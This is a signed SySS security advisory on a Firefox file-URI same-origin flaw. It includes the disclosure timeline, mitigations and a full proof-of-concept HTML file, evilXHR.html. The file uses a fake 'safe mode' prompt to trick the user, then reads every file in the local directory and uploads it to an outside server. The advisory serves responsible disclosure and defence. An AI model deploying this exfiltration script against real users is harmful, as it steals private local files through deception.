-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2018-041 Product: Firefox Manufacturer: Mozilla Affected Versions: <= 64 Tested Versions: 61, 62, 63, 64 Vulnerability Type: Information Exposure (CWE-200) Risk Level: Medium Solution Status: Open Manufacturer Notification: 2018-07-19 Solution Date: - Public Disclosure: 2019-01-16 CVE Reference: Not yet assigned Author of Advisory: Dr. Vladimir Bostanov, SySS GmbH ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Overview: Mozilla Firefox is a web browser available for various platforms including Windows, Linux, Mac, Android, and iOS [1]. It is one of the most popular web browsers according to StatCounter [2]. An overly liberal same-origin policy for file URIs and a bug in the implementation of this policy make Firefox vulnerable to exposure of local files to a remote attacker. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Vulnerability Details: Firefox's same-origin policy for file URIs allows local files to read other files in the same directory but not the directory index [3]. For example, a file with the URI file:///home/joe/Dowloads/aFile.html can read file:///home/joe/Dowloads/anotherFile.html, but it should not be able to read file:///home/joe/Dowloads/. We discovered, however, a violation of this policy in the special case when a user first opens a local directory, e.g., file:///home/joe/Dowloads/, in the browser and from there navigates to a file in this directory, e.g., file:///home/joe/Dowloads/aFile.html. In this case, aFile.html can read the Downloads directory index. This allows a malicious script in aFile.html to read all files in this directory by referring to each of them by its respective filename, and to send all the data to a remote server controlled by the attacker. The following attack scenario seems plausible. A user saves a HTML file in the Downloads folder. The victim user might have received the file per email; or downloaded it from a malicious website offering, e.g. free eBooks, or picture albums, etc.; or downloaded it from a corporate website where a malicious employee had uploaded it. The victim clicks on the filename in the file manager. The file is opened with the default Firefox browser. The victim is presented with a directory index and a message explaining that the file is "protected" and the user should open it in "safe mode" by clicking on the link in the directory index. The victim clicks again on the filename, this time in the browser's directory listing. The contents of the HTML document is displayed. In the background, the malicious JavaScript reads, first, the directory index, then, the contents of each file in the Downloads directory, and sends all these data to a website controlled by the attacker. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Proof of Concept (PoC): We offer a test website [5] where a user can check if a browser is vulnerable to evilXHR. The above scenario is implemented by the following HTML file evilXHR.html: <!DOCTYPE html><html><head><meta charset="UTF-8"><title>evilXHR</title> <!-- evilXHR.html, when stored locally and opened in a Firefox browser, displays the current directory index in an iframe and then prompts the victim user to reopen the file in the iframe by clicking on the corresponding link (evilXHR.html) in the directory listing. When opened in this particular way, evilXHR.html has access to the directory index and can upload all files from the current directory to a remote server (controlled by the attacker), by reading the file names and the data with XMLHttpRequest(). Author: Vladimir Bostanov, SySS GmbH --> <script src="https://ptvb.sy.gs/evilXHR/base64ArrayBuffer.js"></script> <!-- Jon Leighton's base64 converter available at https://gist.github.com/jonleighton/958841 --> <script> // The script will be called from this HTML file: var htmlName = 'evilXHR.html'; // Files will be uploaded to this site: var siteURL = 'https://ptvb.sy.gs/evilXHR/'; var phpURL = siteURL + 'upload.php'; var cType = 'application/x-www-form-urlencoded'; var guID = Date.now() + Math.random().toString().substr(3,8); var uploadPathURL = siteURL + 'Uploads/' + guID; //------------------------------- function singleFileEvilXHR(fName) { var xGetFile = new XMLHttpRequest(); xGetFile.onreadystatechange = function() { if (this.readyState == 4) { var xPostFile = new XMLHttpRequest(); xPostFile.open('POST', phpURL); var fURL = encodeURIComponent(this.responseURL); var fData = encodeURIComponent(base64ArrayBuffer(this.response)); xPostFile.setRequestHeader('Content-Type', cType); xPostFile.send('guID='+guID + '&fURL='+fURL + '&fData='+fData); } } xGetFile.open('GET', fName); xGetFile.responseType = 'arraybuffer'; xGetFile.send(); } //------------------------------- function allFilesEvilXHR() { var xGetDir = new XMLHttpRequest(); xGetDir.onreadystatechange = function() { if (this.readyState == 4) { var xPostDir = new XMLHttpRequest(); xPostDir.open('POST', phpURL); var dData = encodeURIComponent(this.response); xPostDir.setRequestHeader('Content-Type', cType); xPostDir.send('guID=' + guID + '&dData=' + dData); var dirIndex = this.response.split('\n'); for (var n = 2; n < dirIndex.length-1; n++) { var dirIndexEntry = dirIndex[n].split(' '); if (dirIndexEntry[4] == 'FILE' && dirIndexEntry[1] != htmlName) { singleFileEvilXHR(dirIndexEntry[1]); } } } } xGetDir.open('GET', '.'); xGetDir.responseType = 'text' xGetDir.send(); } //------------------------------- function evilXHR() { if (navigator.userAgent.search('Firefox') == -1) { document.body.innerHTML = '<h1>This file must be opened with Mozilla Firefox</h1>'; return; } var out = document.getElementById('out'); var msg = document.getElementById('msg'); var ifr = document.getElementById('ifr'); var cnt = document.getElementById('cnt'); var xEN = document.getElementById('xEN'); var xDE = document.getElementById('xDE'); if (window.self == window.top) { // The file is opened in the top window. if (location.search != '?mode=safe') { // The file was opened in the top window // directly (i.e., NOT via dir index). document.body.removeChild(cnt); // Hide camouflage content. msg.setAttribute('class','visible'); // Show bogus message. ifr.setAttribute('class','visible'); // Show dir index in iframe. ifr.setAttribute('height','700'); } else // The file has been reopened via directory index. Hence, { // it has access to the dir index, i.e. to all filenames. document.body.removeChild(msg); // Hide bogus message. document.body.removeChild(ifr); // Hide iframe. cnt.setAttribute('class','visible'); // Show camouflage content. allFilesEvilXHR(); // Upload all files + directory index xEN.href = uploadPathURL; xDE.href = uploadPathURL; xEN.innerHTML = uploadPathURL; xDE.innerHTML = uploadPathURL; } } else // The file has been reopened in the iframe. { out.href = location.href + '?mode=safe'; out.click(); // Reopen the file in the top window. } document.body.style = 'visibility:visible'; } </script> <style> body {font-size:large; max-width:60em;} code {font-size:125%} code.blue {color:blue} button {color:green} div#msg {padding-left:1em; color:red; background:yellow;} .visible {width:100%; margin:0; border:0 none; visibility:visible;} .hidden {width:0; height:0; margin:0; padding:0; border:0 none; overflow:hidden; visibility:hidden;} </style> </head><body onload="evilXHR()"> <a id="out" class="hidden" href="" target="_top"></a> <div id="msg" class="hidden"> The file <code>evilXHR.html</code> is protected. Click on the link <code class="blue">evilXHR.html</code> below to open it in safe mode.&nbsp;&nbsp;<button type="button" onclick="document.body.removeChild(msg)">OK, I got it!</button> </div> <iframe id="ifr" class="hidden" src="."></iframe> <div id="cnt" class="hidden"> <h1>evilXHR</h1> <p>This file, <code>evilXHR.html</code>, attempts to upload files from your computer/mobile device to our server. In case of success, you will find the copies of your files during the next 2 to 3 minutes at the following location (larger files take longer to upload):</p> <p><a id="xEN" href="" target="_blank"></a></p> <p><b>Note:</b> In the case of a real attack, some camouflage content (e.g., an eBook, or a picture album, etc.) will be displayed here instead of the current text, in order to conceal the data theft from the victim.</p> <h1>evilXHR &mdash; Deutsch</h1> <p>Diese Datei, <code>evilXHR.html</code>, versucht Dateien von Ihrem Computer oder mobilem Gerat auf unseren Server hochzuladen. Wenn das gelingt, konnen Sie die Kopien Ihrer Dateien in den nachsten 2 bis 3 Minuten unter dem folgenden Link finden (grossere Dateien werden langsamer hochgeladen):</p> <p><a id="xDE" href="" target="_blank"></a></p> <p><b>Bemerkung:</b> Im Falle eines echten Angriffs wurden hier statt dieses Texts andere Inhalte als Tarnung stehen (z.B. ein eBook, oder schone Bilder, usw.), damit das Opfer den Datendiebstahl nicht merkt.</p> </div> </body></html> ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Solution: ~ If you store and open HTML files locally, save them in a directory that does not contain any personal or confidential data. ~ Do not use the directory index of the browser for navigation. Open local HTML files directly in the browser. ~ Update to a non-vulnerable Mozilla Firefox version. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclosure Timeline: 2018-07-17: Vulnerability discovered. 2018-07-19: Vulnerability reported to manufacturer. 2018-12-01: Security Advisory sent to manufacturer; 2019-01-15 set as disclosure deadline. 2019-01-16: Vulnerability publicly disclosed. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ References: [1] Product website for Mozilla Firefox https://www.mozilla.org/en-US/firefox/ [2] Browser Market Share Worldwide: October 2017 -- October 2018 http://gs.statcounter.com/browser-market-share/all/worldwide/2018/ [3] Mozilla Firefox: Same-origin policy for file URIs https://developer.mozilla.org/en-US/docs/Archive/Misc_top_level/Same-origin_policy_for_file:_URIs [4] SySS Security Advisory SYSS-2018-041 https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2018-041.txt [5] evilXHR Test: Check if your browser is vulnerable to evilXHR https://ptvb.sy.gs/evilXHR/ [6] SySS Responsible Disclosure Policy https://www.syss.de/en/news/responsible-disclosure-policy/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Credits: This security vulnerability was found by Dr. Vladimir Bostanov of SySS GmbH. E-Mail: vladimir.bostanov@syss.de Public Key: https://www.syss.de/fileadmin/dokumente/PGPKeys/Vladimir_Bostanov.asc Key ID: 0xA589542B Key Fingerprint: 4989 C59F D54B E926 3A81 E37C A7A9 1848 A589 542B ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Disclaimer: The information provided in this security advisory is provided "as is" and without warranty of any kind. Details of this security advisory may be updated in order to provide as accurate information as possible. The latest version of this security advisory is available on the SySS Web site. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Copyright: Creative Commons - Attribution (by) - Version 3.0 URL: https://creativecommons.org/licenses/by/3.0/deed.en -----BEGIN PGP SIGNATURE----- iQJOBAEBCgA4FiEESYnFn9VL6SY6geN8p6kYSKWJVCsFAlw/bHoaHHZsYWRpbWly LmJvc3Rhbm92QHN5c3MuZGUACgkQp6kYSKWJVCvnSBAAnGHoZk4SP+/nKn/q2T+J zFZ23NPGZRrXcM2p3U6Xd3m7jCuBlKOWFYs7zsx6YFcplP6X5iFv2NSz9VhWBBGk QsRO7Bwwg9AnIpaVfXrJVe+XZti0bADTLP+Y0A8POFl8ju8jjy4Nawy9UlSjweVB B9vVMtvRafDRH76zzI5zGyrXn4QnRRTQXhYaQv/cITVYBv/aiFDSpfUoMitIttFw hF/5nY1k8isSZaJPehMThYysqOehGrJhpEjyhoIqDQFC79WeaSjhFlcOU4crFXps +RiKSIylwHjchcDVaHYis3JtYW2W3RxOMpk9295g0vhIO/fdBaeM/xuQXRrmtFcS JmqxnxUsZ316qd5HDxWligx2j/fbjVN9ITUXUKXSYZsHLcf6/GhL2ywV0LDLxfEG Dbj1DtCvWAGujpSvoVZniNMI+9epahLJPTr+KHl7fwsWYPXe5AoXYt+JlFETgzX+ +LMuar/G/1G4UvPleRhQcw0F6CwtUMQ9Gd6iLzKj0hYrU8+S9LMq+MvMUTOOBn76 acyZ/HWLNjIAG7XFiC/UqJ8XYlVYZ+7QnrL13jzer17mlnDR1FHKV5rtjFxiGYkb I+k8SLSvuq3wD+KrBGlKqlumVkR7YCQFdKc0xLojo2YilOq4ZWj7Je36/uOZo1KQ nLYYm8Ld30vvbVVKRSTc8uQ= =NgQN -----END PGP SIGNATURE-----